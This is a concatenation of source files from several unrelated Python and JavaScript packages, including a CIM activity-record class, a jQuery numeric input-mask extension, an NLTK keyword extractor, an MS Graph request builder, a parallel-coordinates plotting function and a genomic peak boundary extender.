"""Records activity for an entity at a point in time; activity may be for an event that has already occurred or for a planned activity.Records activity for an entity at a point in time; activity may be for an event that has already occurred or for a planned activity.
"""
def __init__(self, severity='', createdDateTime='', reason='', category='', ErpPersons=None, Organisations=None, Documents=None, Assets=None, status=None, ScheduledEvent=None, *args, **kw_args):
"""Initialises a new 'ActivityRecord' instance.
@param severity: Severity level of event resulting in this activity record.
@param createdDateTime: Date and time this activity record has been created (different from the 'status.dateTime', which is the time of a status change of the associated object, if applicable).
@param reason: Reason for event resulting in this activity record, typically supplied when user initiated.
@param category: Category of event resulting in this activity record.
@param ErpPersons:
@param Organisations:
@param Documents: All documents for which this activity record has been created.
@param Assets: All assets for which this activity record has been created.
@param status: Information on consequence of event resulting in this activity record.
@param ScheduledEvent:
"""
#: Severity level of event resulting in this activity record.
self.severity = severity
#: Date and time this activity record has been created (different from the 'status.dateTime', which is the time of a status change of the associated object, if applicable).
self.createdDateTime = createdDateTime
#: Reason for event resulting in this activity record, typically supplied when user initiated.
self.reason = reason
#: Category of event resulting in this activity record.
self.category = category
self._ErpPersons = []
self.ErpPersons = [] if ErpPersons is None else ErpPersons
self._Organisations = []
self.Organisations = [] if Organisations is None else Organisations
self._Documents = []
self.Documents = [] if Documents is None else Documents
self._Assets = []
self.Assets = [] if Assets is None else Assets
self.status = status
self._ScheduledEvent = None
self.ScheduledEvent = ScheduledEvent
super(ActivityRecord, self).__init__(*args, **kw_args)
_attrs = ["severity", "createdDateTime", "reason", "category"]
_attr_types = {"severity": str, "createdDateTime": str, "reason": str, "category": str}
_defaults = {"severity": '', "createdDateTime": '', "reason": '', "category": ''}
_enums = {}
_refs = ["ErpPersons", "Organisations", "Documents", "Assets", "status", "ScheduledEvent"]
_many_refs = ["ErpPersons", "Organisations", "Documents", "Assets"]
def getErpPersons(self):
return self._ErpPersons
def setErpPersons(self, value):
for p in self._ErpPersons:
filtered = [q for q in p.ActivityRecords if q != self]
self._ErpPersons._ActivityRecords = filtered
for r in value:
if self not in r._ActivityRecords:
r._ActivityRecords.append(self)
self._ErpPersons = value
ErpPersons = property(getErpPersons, setErpPersons)
def addErpPersons(self, *ErpPersons):
for obj in ErpPersons:
if self not in obj._ActivityRecords:
obj._ActivityRecords.append(self)
self._ErpPersons.append(obj)
def removeErpPersons(self, *ErpPersons):
for obj in ErpPersons:
if self in obj._ActivityRecords:
obj._ActivityRecords.remove(self)
self._ErpPersons.remove(obj)
def getOrganisations(self):
return self._Organisations
def setOrganisations(self, value):
for p in self._Organisations:
filtered = [q for q in p.ActivityRecords if q != self]
self._Organisations._ActivityRecords = filtered
for r in value:
if self not in r._ActivityRecords:
r._ActivityRecords.append(self)
self._Organisations = value
Organisations = property(getOrganisations, setOrganisations)
def addOrganisations(self, *Organisations):
for obj in Organisations:
if self not in obj._ActivityRecords:
obj._ActivityRecords.append(self)
self._Organisations.append(obj)
def removeOrganisations(self, *Organisations):
for obj in Organisations:
if self in obj._ActivityRecords:
obj._ActivityRecords.remove(self)
self._Organisations.remove(obj)
def getDocuments(self):
"""All documents for which this activity record has been created.
"""
return self._Documents
def setDocuments(self, value):
for p in self._Documents:
filtered = [q for q in p.ActivityRecords if q != self]
self._Documents._ActivityRecords = filtered
for r in value:
if self not in r._ActivityRecords:
r._ActivityRecords.append(self)
self._Documents = value
Documents = property(getDocuments, setDocuments)
def addDocuments(self, *Documents):
for obj in Documents:
if self not in obj._ActivityRecords:
obj._ActivityRecords.append(self)
self._Documents.append(obj)
def removeDocuments(self, *Documents):
for obj in Documents:
if self in obj._ActivityRecords:
obj._ActivityRecords.remove(self)
self._Documents.remove(obj)
def getAssets(self):
"""All assets for which this activity record has been created.
"""
return self._Assets
def setAssets(self, value):
for p in self._Assets:
filtered = [q for q in p.ActivityRecords if q != self]
self._Assets._ActivityRecords = filtered
for r in value:
if self not in r._ActivityRecords:
r._ActivityRecords.append(self)
self._Assets = value
Assets = property(getAssets, setAssets)
def addAssets(self, *Assets):
for obj in Assets:
if self not in obj._ActivityRecords:
obj._ActivityRecords.append(self)
self._Assets.append(obj)
def removeAssets(self, *Assets):
for obj in Assets:
if self in obj._ActivityRecords:
obj._ActivityRecords.remove(self)
self._Assets.remove(obj)
# Information on consequence of event resulting in this activity record.
status = None
def getScheduledEvent(self):
return self._ScheduledEvent
def setScheduledEvent(self, value):
if self._ScheduledEvent is not None:
self._ScheduledEvent._ActivityRecord = None
self._ScheduledEvent = value
if self._ScheduledEvent is not None:
self._ScheduledEvent.ActivityRecord = None
self._ScheduledEvent._ActivityRecord = self
ScheduledEvent = property(getScheduledEvent, setScheduledEvent) | PypiClean |
/nobinobi-child-0.1.4.14.tar.gz/nobinobi-child-0.1.4.14/nobinobi_child/static/vendor/adminLTE/plugins/input-mask/jquery.inputmask.numeric.extensions.js | (function ($) {
//number aliases
$.extend($.inputmask.defaults.aliases, {
'decimal': {
mask: "~",
placeholder: "",
repeat: "*",
greedy: false,
numericInput: false,
isNumeric: true,
digits: "*", //number of fractionalDigits
groupSeparator: "",//",", // | "."
radixPoint: ".",
groupSize: 3,
autoGroup: false,
allowPlus: true,
allowMinus: true,
//todo
integerDigits: "*", //number of integerDigits
defaultValue: "",
prefix: "",
suffix: "",
//todo
getMaskLength: function (buffer, greedy, repeat, currentBuffer, opts) { //custom getMaskLength to take the groupSeparator into account
var calculatedLength = buffer.length;
if (!greedy) {
if (repeat == "*") {
calculatedLength = currentBuffer.length + 1;
} else if (repeat > 1) {
calculatedLength += (buffer.length * (repeat - 1));
}
}
var escapedGroupSeparator = $.inputmask.escapeRegex.call(this, opts.groupSeparator);
var escapedRadixPoint = $.inputmask.escapeRegex.call(this, opts.radixPoint);
var currentBufferStr = currentBuffer.join(''), strippedBufferStr = currentBufferStr.replace(new RegExp(escapedGroupSeparator, "g"), "").replace(new RegExp(escapedRadixPoint), ""),
groupOffset = currentBufferStr.length - strippedBufferStr.length;
return calculatedLength + groupOffset;
},
postFormat: function (buffer, pos, reformatOnly, opts) {
if (opts.groupSeparator == "") return pos;
var cbuf = buffer.slice(),
radixPos = $.inArray(opts.radixPoint, buffer);
if (!reformatOnly) {
cbuf.splice(pos, 0, "?"); //set position indicator
}
var bufVal = cbuf.join('');
if (opts.autoGroup || (reformatOnly && bufVal.indexOf(opts.groupSeparator) != -1)) {
var escapedGroupSeparator = $.inputmask.escapeRegex.call(this, opts.groupSeparator);
bufVal = bufVal.replace(new RegExp(escapedGroupSeparator, "g"), '');
var radixSplit = bufVal.split(opts.radixPoint);
bufVal = radixSplit[0];
var reg = new RegExp('([-\+]?[\\d\?]+)([\\d\?]{' + opts.groupSize + '})');
while (reg.test(bufVal)) {
bufVal = bufVal.replace(reg, '$1' + opts.groupSeparator + '$2');
bufVal = bufVal.replace(opts.groupSeparator + opts.groupSeparator, opts.groupSeparator);
}
if (radixSplit.length > 1)
bufVal += opts.radixPoint + radixSplit[1];
}
buffer.length = bufVal.length; //align the length
for (var i = 0, l = bufVal.length; i < l; i++) {
buffer[i] = bufVal.charAt(i);
}
var newPos = $.inArray("?", buffer);
if (!reformatOnly) buffer.splice(newPos, 1);
return reformatOnly ? pos : newPos;
},
regex: {
number: function (opts) {
var escapedGroupSeparator = $.inputmask.escapeRegex.call(this, opts.groupSeparator);
var escapedRadixPoint = $.inputmask.escapeRegex.call(this, opts.radixPoint);
var digitExpression = isNaN(opts.digits) ? opts.digits : '{0,' + opts.digits + '}';
var signedExpression = opts.allowPlus || opts.allowMinus ? "[" + (opts.allowPlus ? "\+" : "") + (opts.allowMinus ? "-" : "") + "]?" : "";
return new RegExp("^" + signedExpression + "(\\d+|\\d{1," + opts.groupSize + "}((" + escapedGroupSeparator + "\\d{" + opts.groupSize + "})?)+)(" + escapedRadixPoint + "\\d" + digitExpression + ")?$");
}
},
onKeyDown: function (e, buffer, opts) {
var $input = $(this), input = this;
if (e.keyCode == opts.keyCode.TAB) {
var radixPosition = $.inArray(opts.radixPoint, buffer);
if (radixPosition != -1) {
var masksets = $input.data('_inputmask')['masksets'];
var activeMasksetIndex = $input.data('_inputmask')['activeMasksetIndex'];
for (var i = 1; i <= opts.digits && i < opts.getMaskLength(masksets[activeMasksetIndex]["_buffer"], masksets[activeMasksetIndex]["greedy"], masksets[activeMasksetIndex]["repeat"], buffer, opts) ; i++) {
if (buffer[radixPosition + i] == undefined || buffer[radixPosition + i] == "") buffer[radixPosition + i] = "0";
}
input._valueSet(buffer.join(''));
}
} else if (e.keyCode == opts.keyCode.DELETE || e.keyCode == opts.keyCode.BACKSPACE) {
opts.postFormat(buffer, 0, true, opts);
input._valueSet(buffer.join(''));
return true;
}
},
definitions: {
'~': { //real number
validator: function (chrs, buffer, pos, strict, opts) {
if (chrs == "") return false;
if (!strict && pos <= 1 && buffer[0] === '0' && new RegExp("[\\d-]").test(chrs) && buffer.join('').length == 1) { //handle first char
buffer[0] = "";
return { "pos": 0 };
}
var cbuf = strict ? buffer.slice(0, pos) : buffer.slice();
cbuf.splice(pos, 0, chrs);
var bufferStr = cbuf.join('');
//strip groupseparator
var escapedGroupSeparator = $.inputmask.escapeRegex.call(this, opts.groupSeparator);
bufferStr = bufferStr.replace(new RegExp(escapedGroupSeparator, "g"), '');
var isValid = opts.regex.number(opts).test(bufferStr);
if (!isValid) {
//let's help the regex a bit
bufferStr += "0";
isValid = opts.regex.number(opts).test(bufferStr);
if (!isValid) {
//make a valid group
var lastGroupSeparator = bufferStr.lastIndexOf(opts.groupSeparator);
for (var i = bufferStr.length - lastGroupSeparator; i <= 3; i++) {
bufferStr += "0";
}
isValid = opts.regex.number(opts).test(bufferStr);
if (!isValid && !strict) {
if (chrs == opts.radixPoint) {
isValid = opts.regex.number(opts).test("0" + bufferStr + "0");
if (isValid) {
buffer[pos] = "0";
pos++;
return { "pos": pos };
}
}
}
}
}
if (isValid != false && !strict && chrs != opts.radixPoint) {
var newPos = opts.postFormat(buffer, pos, false, opts);
return { "pos": newPos };
}
return isValid;
},
cardinality: 1,
prevalidator: null
}
},
insertMode: true,
autoUnmask: false
},
'integer': {
regex: {
number: function (opts) {
var escapedGroupSeparator = $.inputmask.escapeRegex.call(this, opts.groupSeparator);
var signedExpression = opts.allowPlus || opts.allowMinus ? "[" + (opts.allowPlus ? "\+" : "") + (opts.allowMinus ? "-" : "") + "]?" : "";
return new RegExp("^" + signedExpression + "(\\d+|\\d{1," + opts.groupSize + "}((" + escapedGroupSeparator + "\\d{" + opts.groupSize + "})?)+)$");
}
},
alias: "decimal"
}
});
})(jQuery); | PypiClean |
/keywords-0.0.1.zip/keywords-0.0.1/keywords.py | import re
from nltk import RegexpParser, pos_tag
class KeyWords(object):
def __init__(self, corpus=None, stop_words=[], alpha=0.5):
if alpha < 0.0 or alpha > 1.0:
raise ValueError("Alpha should be between 0-1")
self.stop_words = stop_words
stop_word_regex_list = []
for word in self.stop_words:
word_regex = r'\b' + word + r'(?![\w-])'
stop_word_regex_list.append(word_regex)
self.stop_word_pattern = re.compile('|'.join(stop_word_regex_list), re.IGNORECASE)
self.corpus = corpus
self.alpha = alpha
self.parser = RegexpParser('''
KEYWORDS: {<DT>? <JJ>* <NN.*>+}
P: {<IN>}
V: {<V.*>}
PHRASES: {<P> <KEYWORDS>}
ACTIONS: {<V> <KEYWORDS|PHRASES>*}
''')
def is_number(self, s):
try:
float(s) if '.' in s else int(s)
return True
except ValueError:
return False
def _sentence_tokenize(self, text):
sentence_split = re.compile(u'[.!?,;:\t\\\\"\\(\\)\\\'\u2019\u2013\n]|\\s\\-\\s')
sentences = sentence_split.split(text)
return sentences
def _phrase_tokenize(self, sentences):
phrase_list = []
for s in sentences:
tmp = re.sub(self.stop_word_pattern, '|', s.strip())
phrases = tmp.split("|")
for phrase in phrases:
phrase = phrase.strip().lower()
if phrase != "":
phrase_list.append(phrase)
phrase_list_new = []
for p in phrase_list:
tags = pos_tag(self._word_tokenize(p))
if tags != []:
chunks = self.parser.parse(tags)
for subtree in chunks.subtrees(filter=lambda t: t.label() == 'KEYWORDS'):
keyword = ' '.join([i[0] for i in subtree])
phrase_list_new.append(keyword)
return phrase_list_new
def _word_tokenize(self, text):
splitter = re.compile('[^a-zA-Z0-9_\\+\\-/]')
words = []
for single_word in splitter.split(text):
current_word = single_word.strip().lower()
if current_word != '' and not self.is_number(current_word):
words.append(current_word)
return words
@property
def _corpus_keywords(self):
if self.corpus:
sents = self._sentence_tokenize(self.corpus)
return self._phrase_tokenize(sents)
else:
return None
def compute_word_scores(self, phraseList):
word_frequency = {}
word_degree = {}
for phrase in phraseList:
word_list = self._word_tokenize(phrase)
word_list_length = len(word_list)
word_list_degree = word_list_length - 1
for word in word_list:
word_frequency.setdefault(word, 0)
word_frequency[word] += 1
word_degree.setdefault(word, 0)
word_degree[word] += word_list_degree
for item in word_frequency:
word_degree[item] = word_degree[item] + word_frequency[item]
word_score = {}
for item in word_frequency:
word_score.setdefault(item, 0)
word_score[item] = word_degree[item] / (word_frequency[item] * 1.0)
return word_score
@property
def _corpus_keyword_scores(self):
corp_keywords = self._corpus_keywords
if corp_keywords:
word_scores = self.compute_word_scores(corp_keywords)
keyword_candidates = {}
for phrase in corp_keywords:
keyword_candidates.setdefault(phrase, 0)
word_list = self._word_tokenize(phrase)
candidate_score = 0
for word in word_list:
candidate_score += word_scores[word]
keyword_candidates[phrase] = candidate_score
return keyword_candidates
else:
return None
def phrase_scroing(self, phrase_list, word_score):
corp_scores = self._corpus_keyword_scores
keyword_candidates = {}
for phrase in phrase_list:
keyword_candidates.setdefault(phrase, 0)
word_list = self._word_tokenize(phrase)
candidate_score = 0
for word in word_list:
candidate_score += word_score[word]
if corp_scores:
keyword_candidates[phrase] = (1-self.alpha)*candidate_score + (self.alpha)*(corp_scores[phrase] if phrase in corp_scores else 0.0)
else:
keyword_candidates[phrase] = candidate_score
return keyword_candidates
def get_keywords(self, text, n=20):
sentence_list = self._sentence_tokenize(text)
phrase_list = self._phrase_tokenize(sentence_list)
word_scores = self.compute_word_scores(phrase_list)
keyword_candidates = self.phrase_scroing(phrase_list, word_scores)
return sorted(keyword_candidates.items(), key=lambda x: x[1], reverse=True)[:n] | PypiClean |
/msgraph_beta_sdk-1.0.0a9-py3-none-any.whl/msgraph/generated/groups/item/sites/item/term_store/sets/item/parent_group/sets/item/children/item/relations/item/to_term/to_term_request_builder.py | from __future__ import annotations
from dataclasses import dataclass
from kiota_abstractions.get_path_parameters import get_path_parameters
from kiota_abstractions.method import Method
from kiota_abstractions.request_adapter import RequestAdapter
from kiota_abstractions.request_information import RequestInformation
from kiota_abstractions.request_option import RequestOption
from kiota_abstractions.response_handler import ResponseHandler
from kiota_abstractions.serialization import Parsable, ParsableFactory
from typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union
if TYPE_CHECKING:
from ................models.o_data_errors import o_data_error
from ................models.term_store import term
class ToTermRequestBuilder():
"""
Provides operations to manage the toTerm property of the microsoft.graph.termStore.relation entity.
"""
def __init__(self,request_adapter: RequestAdapter, path_parameters: Optional[Union[Dict[str, Any], str]] = None) -> None:
"""
Instantiates a new ToTermRequestBuilder and sets the default values.
Args:
pathParameters: The raw url or the Url template parameters for the request.
requestAdapter: The request adapter to use to execute the requests.
"""
if path_parameters is None:
raise Exception("path_parameters cannot be undefined")
if request_adapter is None:
raise Exception("request_adapter cannot be undefined")
# Url template to use to build the URL for the current request builder
self.url_template: str = "{+baseurl}/groups/{group%2Did}/sites/{site%2Did}/termStore/sets/{set%2Did}/parentGroup/sets/{set%2Did1}/children/{term%2Did}/relations/{relation%2Did}/toTerm{?%24select,%24expand}"
url_tpl_params = get_path_parameters(path_parameters)
self.path_parameters = url_tpl_params
self.request_adapter = request_adapter
async def get(self,request_configuration: Optional[ToTermRequestBuilderGetRequestConfiguration] = None) -> Optional[term.Term]:
"""
The to [term] of the relation. The term to which the relationship is defined.
Args:
requestConfiguration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: Optional[term.Term]
"""
request_info = self.to_get_request_information(
request_configuration
)
from ................models.o_data_errors import o_data_error
error_mapping: Dict[str, ParsableFactory] = {
"4XX": o_data_error.ODataError,
"5XX": o_data_error.ODataError,
}
if not self.request_adapter:
raise Exception("Http core is null")
from ................models.term_store import term
return await self.request_adapter.send_async(request_info, term.Term, error_mapping)
def to_get_request_information(self,request_configuration: Optional[ToTermRequestBuilderGetRequestConfiguration] = None) -> RequestInformation:
"""
The to [term] of the relation. The term to which the relationship is defined.
Args:
requestConfiguration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: RequestInformation
"""
request_info = RequestInformation()
request_info.url_template = self.url_template
request_info.path_parameters = self.path_parameters
request_info.http_method = Method.GET
request_info.headers["Accept"] = ["application/json"]
if request_configuration:
request_info.add_request_headers(request_configuration.headers)
request_info.set_query_string_parameters_from_raw_object(request_configuration.query_parameters)
request_info.add_request_options(request_configuration.options)
return request_info
@dataclass
class ToTermRequestBuilderGetQueryParameters():
"""
The to [term] of the relation. The term to which the relationship is defined.
"""
def get_query_parameter(self,original_name: Optional[str] = None) -> str:
"""
Maps the query parameters names to their encoded names for the URI template parsing.
Args:
originalName: The original query parameter name in the class.
Returns: str
"""
if original_name is None:
raise Exception("original_name cannot be undefined")
if original_name == "expand":
return "%24expand"
if original_name == "select":
return "%24select"
return original_name
# Expand related entities
expand: Optional[List[str]] = None
# Select properties to be returned
select: Optional[List[str]] = None
@dataclass
class ToTermRequestBuilderGetRequestConfiguration():
"""
Configuration for the request such as headers, query parameters, and middleware options.
"""
# Request headers
headers: Optional[Dict[str, Union[str, List[str]]]] = None
# Request options
options: Optional[List[RequestOption]] = None
# Request query parameters
query_parameters: Optional[ToTermRequestBuilder.ToTermRequestBuilderGetQueryParameters] = None | PypiClean |
/views_dataviz-0.10.0.tar.gz/views_dataviz-0.10.0/views_dataviz/pcoord.py |
from typing import List, Dict, Tuple
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
def plot_parallel_coordinates(
df: pd.DataFrame,
columns: List[str],
linecolors: Dict[str, str] = None,
linestyles: Dict[str, str] = None,
reverse: List[str] = None,
figsize: Tuple[float, float] = (10.0, 5.0),
labelsize: float = 12.0,
titlesize: float = 16.0,
legend_anchor: Tuple[float, float] = (1.2, 1.0),
lw: float = 2.0,
path: str = None,
):
"""Generates a parallel coordinates plot.
Parameters
----------
df: pd.DataFrame containing the scores to plot, indexed on the subject
(models for example).
columns: List or column names for the metrics to plot.
linecolors: Dictionary of index: color pairs to overwrite. Colors
default to tab10. For example: {"model_a": "green", "model_b": "red"}.
linestyles: Dictionary of column: style pairs to overwrite. Styles
default to "solid". For example: {"model_a": "solid", "model_b": "dotted"}.
reverse: Optional list of column names to reverse to descending descending scale.
figsize: Tuple of figure size in inches.
labelsize: Textsize of figure labels.
titlesize: Textsize of figure title.
legend_anchor: Tuple of legend location on x and y in axes coordinates.
lw: Float for the width of all plotted lines.
path: Optional string path. Writes figure to path if set.
"""
values = df[columns].values
ymins, ymaxs = values.min(axis=0), values.max(axis=0)
# Optional reverse applied to columns.
if reverse is not None:
for col in reverse:
index = columns.index(col)
ymaxs[index], ymins[index] = ymins[index], ymaxs[index]
# Add some padding to the ranges, and recompute deltas.
deltas = ymaxs - ymins
ymins -= deltas * 0.1
ymaxs += deltas * 0.1
deltas = ymaxs - ymins
# Prepare the figure array.
zvalues = np.zeros_like(values)
zvalues[:, 0] = values[:, 0]
# Transform all data beyond the first column using broadcasting to be
# compatible with the first axis.
zvalues[:, 1:] = (values[:, 1:] - ymins[1:]) / deltas[1:] * deltas[
0
] + ymins[0]
# Draw the figure.
fig, host = plt.subplots(figsize=figsize)
axes = [host] + [host.twinx() for i in range(values.shape[1] - 1)]
for i, ax in enumerate(axes):
# Set the tick range manually, adapting from host.
# Note that the actual lines will be plotted according to the
# transformed zvalues above (i.e. all in terms of axis 0.), making
# them essentially cosmetic axes. No lines are actually connected.
ax.set_ylim(ymins[i], ymaxs[i])
ax.spines["top"].set_visible(False)
ax.spines["bottom"].set_visible(False)
if ax != host:
ax.spines["left"].set_visible(False)
ax.yaxis.set_ticks_position("right")
# Reset drawing position of non-host axes (i fraction of len cols).
ax.spines["right"].set_position(
("axes", i / (values.shape[1] - 1))
)
# Adjust host axis.
host.set_xlim(0, values.shape[1] - 1) # Remove padding.
host.set_xticks(range(values.shape[1])) # Set ticks before rename.
host.set_xticklabels(list(df.columns), fontsize=labelsize)
host.tick_params(axis="x", which="major", pad=8) # Add vertical pad.
host.spines["right"].set_visible(False)
host.xaxis.tick_top() # Move x-axis labels on top.
host.set_title("test", fontsize=titlesize, pad=20)
# Prepare styles of plot. Overwrite defaults with linecolors, linestyles.
cmap = plt.get_cmap("tab10")
colors = {idx: cmap(i) for i, idx in enumerate(df.index)}
if linecolors is not None:
for key in linecolors.keys():
colors[key] = linecolors[key]
styles = {idx: "solid" for idx in df.index}
if linestyles is not None:
for key in linestyles.keys():
styles[key] = linestyles[key]
# Plot the lines: for j submission, chart the row values by column
for i, j in zip(df.index, range(values.shape[0])):
host.plot(
range(values.shape[1]), # x
zvalues[j, :], # y
c=colors[i],
linestyle=styles[i],
lw=lw,
)
host.legend(
labels=df[columns].index,
loc="center",
bbox_to_anchor=legend_anchor,
frameon=False,
)
if path:
fig.savefig(
path,
dpi=200,
facecolor="white",
bbox_inches="tight",
)
plt.close(fig) | PypiClean |
/pyPINTS-1.1.9-py3-none-any.whl/pints/extension_engine.py |
# PINTS: Peak Identifier for Nascent Transcripts Starts
# Copyright (c) 2019-2022. Li Yao at the Yu Lab.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
import os
import sys
import logging
import warnings
try:
import numpy as np
import pandas as pd
from pybedtools import BedTool
from pints.io_engine import get_read_signal, get_coverage_bw, log_assert
from collections import namedtuple
except ImportError as e:
missing_package = str(e).replace("No module named '", "").replace("'", "")
sys.exit("Please install %s first!" % missing_package)
warnings.filterwarnings("error")
logger = logging.getLogger("PINTS - BoundaryExtender")
__EXTENDED_FILE_TPL__ = "_element_{de_tag}bp.bed"
__EXTENDED_DISTAL_FILE_TPL__ = "_element_{de_tag}bp_e.bed"
def main(input_file, layout, div_file, bid_file, single_file, divergent_extension=(60, 60),
unidirectional_extension=(60, 60), promoter_bed=None):
"""
Extend boundaries
Parameters
----------
input_file : str
Path to a bam file
layout : str
Layout out the bam file
div_file : str
Path to divergent peaks PINTS called
bid_file : str
Path to bidirectional peaks PINTS called
single_file : str
Path to unidirectional peaks PINTS called
divergent_extension : tuple
BPs to be extended for both divergent and bidirectional peaks
unidirectional_extension : tuple
BPs to be extended for unidirectional peaks
promoter_bed : str or None
Path to a bed file which defines promoter regions
Returns
-------
None
"""
de_tag = "_".join(set(map(str, divergent_extension)))
parent_path = os.path.dirname(div_file)
if isinstance(input_file, str):
log_assert(layout is not None,
"Please specify which type of experiment this data was generated from with --exp-type", logger)
pl, mn, _ = get_read_signal(input_file, loc_prime=layout, chromosome_startswith="chr",
output_dir=parent_path, output_prefix=str(os.getpid()))
else:
log_assert(len(input_file[0]) == len(input_file[1]),
"Must provide the same amount of bigwig files for both strands", logger)
pl, mn, _ = get_coverage_bw(bw_pl=input_file[0], bw_mn=input_file[1],
chromosome_startswith="chr",
output_dir=parent_path,
output_prefix=str(os.getpid()))
div = pd.read_csv(div_file, sep="\t", header=None)
div = div.loc[np.logical_or(div[0].isin(pl), div[0].isin(mn)), :]
bid = pd.read_csv(bid_file, sep="\t", header=None)
bid = bid.loc[np.logical_or(bid[0].isin(pl), bid[0].isin(mn)), :]
single = pd.read_csv(single_file, sep="\t", header=None)
single = single.loc[np.logical_or(single[0].isin(pl), single[0].isin(mn)), :]
div["pl_summit"] = 0
div["mn_summit"] = 0
div["element_start"] = 0
div["element_end"] = 0
bid["pl_summit"] = 0
bid["mn_summit"] = 0
single["summit"] = 0
for chromosome in pl:
pl_cov = np.load(pl[chromosome], allow_pickle=True)
mn_cov = np.load(mn[chromosome], allow_pickle=True)
div_sub = div.loc[div[0] == chromosome, :]
bid_sub = bid.loc[bid[0] == chromosome, :]
for sub_df, all_df in zip((div_sub, bid_sub), (div, bid)):
for nr, row in sub_df.iterrows():
pcov = pl_cov[row[1]:row[2]]
mcov = mn_cov[row[1]:row[2]]
cpls = np.where(pcov == pcov.max())[0] + row[1]
cmns = np.where(mcov == mcov.max())[0] + row[1]
all_df.loc[nr, "pl_summit"] = ",".join([str(x) for x in cpls])
all_df.loc[nr, "mn_summit"] = ",".join([str(x) for x in cmns])
# extend boundaries with the following conditions:
# Find the prominent peaks at basepair resolution (any peaks with ⅓ of the highest peak and >5 reads)
# and extend x (60, 200, or others) bps beyond the furthest prominent peak
plb = np.nanmax(pcov)
mlb = np.nanmax(mcov)
pl_threshold = min(plb, max(plb * 0.3, 5))
mn_threshold = min(mlb, max(mlb * 0.3, 5))
pl_probe = np.where(pcov > pl_threshold)[0]
if pl_probe.shape[0] > 1:
cpl = min(pl_probe[-1] + row[1], row[2])
else:
cpl = cpls[-1]
mn_probe = np.where(mcov > mn_threshold)[0]
if mn_probe.shape[0] > 1:
cmn = max(mn_probe[0] + row[1], row[1])
else:
cmn = cmns[0]
f = min(cpl, cmn) - divergent_extension[0]
r = max(cpl, cmn) + divergent_extension[1]
# only update the boundaries if the new ones are larger than the old ones
all_df.loc[nr, "element_start"] = f if f < row[1] else row[1]
all_df.loc[nr, "element_end"] = r if r > row[2] else row[2]
# unidirectional elements are defined as:
# peak region boundaries defined by PINTS
# go upstream 300bp (we assume the opposite peak should be within 300 bp),
# then further +60 or +200bp to define the whole element
single_sub = single.loc[single[0] == chromosome, :]
for nr, row in single_sub.iterrows():
if row[5] == "+":
f = row[1] - unidirectional_extension[0] - 300
r = row[2] + unidirectional_extension[1]
else:
f = row[1] - unidirectional_extension[0]
r = row[2] + unidirectional_extension[1] + 300
single.loc[nr, "element_start"] = f
single.loc[nr, "element_end"] = r
div = div.loc[:, (0, "element_start", "element_end", 3, 4, 5)]
div.element_start = div.element_start.astype(int)
div.element_end = div.element_end.astype(int)
div.loc[div.element_start < 0, "element_start"] = 0
div["ID"] = ["Divergent" + str(i) for i in list(div.index)]
div["strand"] = "."
div = div[[0, "element_start", "element_end", "ID", 3, "strand", 5, 4]]
bid = bid.loc[:, (0, "element_start", "element_end", 3, 4, 5)]
bid.element_start = bid.element_start.astype(int)
bid.element_end = bid.element_end.astype(int)
bid.loc[bid.element_start < 0, "element_start"] = 0
bid["ID"] = ["Bidirectional" + str(i) for i in list(bid.index)]
bid["strand"] = "."
bid = bid[[0, "element_start", "element_end", "ID", 3, "strand", 5, 4]]
single = single.loc[:, (0, "element_start", "element_end", 3, 4, 5, 7)]
single.element_start = single.element_start.astype(int)
single.element_end = single.element_end.astype(int)
single.loc[single.element_start < 0, "element_start"] = 0
single["ID"] = ["Unidirectional" + str(i) for i in list(single.index)]
div.to_csv(div_file.replace(".bed", __EXTENDED_FILE_TPL__.format(de_tag=de_tag)), sep="\t", index=False,
header=False)
bid.to_csv(bid_file.replace(".bed", __EXTENDED_FILE_TPL__.format(de_tag=de_tag)), sep="\t", index=False,
header=False)
single_obj = BedTool(single.to_csv(sep="\t", index=False, header=False), from_string=True)
# div_obj = BedTool(div.to_csv(sep="\t", index=False, header=False), from_string=True)
# bid_obj = BedTool(bid.to_csv(sep="\t", index=False, header=False), from_string=True)
# single_obj = single_obj.intersect(div_obj, v=True)
# single_obj = single_obj.intersect(bid_obj, v=True)
if promoter_bed is not None:
promoter_bed_obj = BedTool(promoter_bed)
BedTool.from_dataframe(div).intersect(promoter_bed_obj, v=True).saveas(
div_file.replace(".bed", __EXTENDED_DISTAL_FILE_TPL__.format(de_tag=de_tag)))
BedTool.from_dataframe(bid).intersect(promoter_bed_obj, v=True).saveas(
bid_file.replace(".bed", __EXTENDED_DISTAL_FILE_TPL__.format(de_tag=de_tag)))
single_obj.intersect(promoter_bed_obj, v=True).saveas(
single_file.replace(".bed", __EXTENDED_DISTAL_FILE_TPL__.format(de_tag=de_tag)))
single_obj.moveto(single_file.replace(".bed", __EXTENDED_FILE_TPL__.format(de_tag=de_tag)))
housekeeping_files = []
housekeeping_files.extend(pl.values())
housekeeping_files.extend(mn.values())
for hf in housekeeping_files:
if os.path.exists(hf):
try:
os.remove(hf)
except IOError:
pass
def extend(args):
if sum((args.bw_pl is None, args.bw_mn is None)) == 1:
raise ValueError("both of the two arguments --bw-pl --bw-mn are required")
if args.bam_files is not None and not len(args.bam_files) == len(args.divergent_files) == len(
args.bidirectional_files) == len(args.unidirectional_files):
raise ValueError("Number of peak calls from different categories should match")
if args.bw_pl is not None and not len(args.bw_pl) == len(args.bw_mn) == len(args.divergent_files) == len(
args.bidirectional_files) == len(args.unidirectional_files):
raise ValueError("Number of peak calls from different categories should match")
assert len(args.div_ext_left) == len(args.div_ext_right)
assert len(args.unidirectional_ext_left) == len(args.unidirectional_ext_right)
for i in range(1, (len(args.bam_files) if args.bam_files is not None else len(args.bw_pl)) + 1):
groups = {
"divergent_calls": None,
"bidirectional_calls": None,
"unidirectional_calls": None
}
element_types = ("divergent_peaks", "bidirectional_peaks", "unidirectional_peaks")
for et in element_types:
k = "_{index}_{et}.bed".format(index=i, et=et)
for df in args.divergent_files:
if df.find(k) != -1:
groups["divergent_calls"] = df
for bf in args.bidirectional_files:
if bf.find(k) != -1:
groups["bidirectional_calls"] = bf
for sf in args.unidirectional_files:
if sf.find(k) != -1:
groups["unidirectional_calls"] = sf
